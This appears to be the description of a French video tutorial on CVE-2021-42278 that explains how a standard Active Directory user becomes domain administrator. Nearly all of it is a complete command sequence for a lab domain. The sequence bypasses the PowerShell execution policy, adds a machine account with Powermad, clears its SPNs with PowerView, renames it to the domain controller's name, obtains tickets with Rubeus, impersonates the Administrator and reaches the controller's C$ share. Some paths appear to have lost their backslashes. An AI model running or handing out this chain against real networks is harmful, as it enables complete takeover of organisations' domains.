Devenir Admin du domaine en moins de 30 secondes !



Devenir Admin du domaine en moins de 30 secondes !

Devenir Admin du domaine en moins de 30 secondes !

#pentesting #cybersecurity #hacking

Tutoriel en français détaillant le fonctionnement de la vulnérabilité CVE-2021-42278 permettant une élévation de privilèges sur un domaine active directory pour devenir administrateur du domaine à partir d’un compte utilisateur standard.

Le lien du mitre sur la vulnérabilité :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42278

————————————
Les commandes a exécuter :

# Lancer un powershell sans restriction
powershell -ep bypass

# Vider les tickets présents en mémoire
klist purge

# Charger le module Powermad et ajouter une machine au domaine avec un mot de passe de compte machine défini
Import-Module .Powermad.ps1
New-MachineAccount -MachineAccount test23 -Domain pwndeleg.local -DomainController DC01.pwndeleg.local -Verbose

# Charger le module PowerView et supprimer les SPN de la machine
Import-Module .PowerView.ps1
Set-DomainObject “CN=test23,CN=Computers,DC=pwndeleg,DC=local” -Clear ‘serviceprincipalname’ -Verbose

# Modifier le SamAccountName de la machine
Set-MachineAccountAttribute -MachineAccount test23 -Value “DC01” -Attribute sAMAccountName -Verbose

# Demander un ticket TGT en tant que compte machine DC01
.Rubeus.exe asktgt /user:DC01 /password:12345 /domain:pwndeleg.local /dc:DC01.pwndeleg.local /nowrap

# Remettre le SamAccountName de notre machine par défaut
Set-MachineAccountAttribute -MachineAccount test23 -Value “test23” -Attribute sAMAccountName -Verbose

# Demander un ticket TGS avec notre ticket TGT en tant que Administrateur sur DC01
.Rubeus.exe s4u /impersonateuser:Administrateur /nowrap /dc:DC01.pwndeleg.local /self /altservice:CIFS/DC01.pwndeleg.local /ptt /ticket:

# Lister les tickets présents en mémoire
klist

#Accéder au partage administratif c$ sur DC01 en tant qu’administrateur
dir \DC01.pwndeleg.localc$

————————————

Mon blog :
https://lestutosdeprocessus.fr

Le lien de mon serveur Discord :
https://discord.gg/JJNxV2h

Comments are closed.